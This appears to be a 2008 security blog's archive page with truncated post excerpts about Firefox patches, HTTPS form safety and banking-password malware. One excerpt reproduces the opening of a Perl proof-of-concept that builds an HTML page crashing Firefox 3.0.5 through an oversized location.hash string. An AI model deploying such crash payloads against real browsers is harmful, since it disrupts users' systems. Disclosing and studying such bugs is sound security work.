Tuesday, December 23rd, 2008 Here's a quick little tip for users that might not know enough about internet security and privacy to stop and look for SSL/TLS (https://) when submitting forms on the web. Or maybe the form page itself is on an unencrypted page, but the data actually gets sent encrypted when the ...
Posted in Internet, Linux, Privacy, Security, Windows | 1 Comment
Tuesday, December 23rd, 2008 #!/usr/bin/perl
# mzff_lhash_dos.pl
# Mozilla Firefox 3.0.5 location.hash Denial of Service Exploit
# Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com]
# Crash on Vista, play with it on XP$filename = $ARGV[0];
if(!defined($filename))
{print "Usage: $0 <filename.html>\n\n";}$head = "<html>" . "\n" . "<script type=\"text/javascript\">" . "\n";
$trig = "location.hash = \"" . "A" x 20000000 . "\";" ...
Posted in Coding, Internet, Security | No Comments
Wednesday, December 17th, 2008 Mozilla has issued eight patches for its Firefox Web browser, three of which fix problems classified as critical.The patches come after security experts have recommended using a browser other than Microsoft's Internet Explorer 7 and older versions of IE due to a dangerous vulnerability. Microsoft is due to release an ...
Posted in Internet, Security, Software | No Comments
Thursday, December 4th, 2008 Researchers at BitDefender have discovered a new type of malicious software that collects passwords for banking sites but targets only Firefox users.The malware, which BitDefender dubbed "Trojan.PWS.ChromeInject.A" sits in Firefox's add-ons folder, said Viorel Canja, the head of BitDefender's lab. The malware runs when Firefox is started.The malware uses JavaScript ...
Posted in Internet, Privacy, Security, Software | No Comments
Thursday, November 13th, 2008 The Mozilla Foundation has released Firefox version 3.0.4 to close nine security holes. The developers rated four of the holes as critical because they allow attackers to execute arbitrary code on the victim's system. One of the critical holes is a classical buffer overflow that can be triggered via specially ...
Posted in Internet, Linux, Security, Software, Windows | No Comments
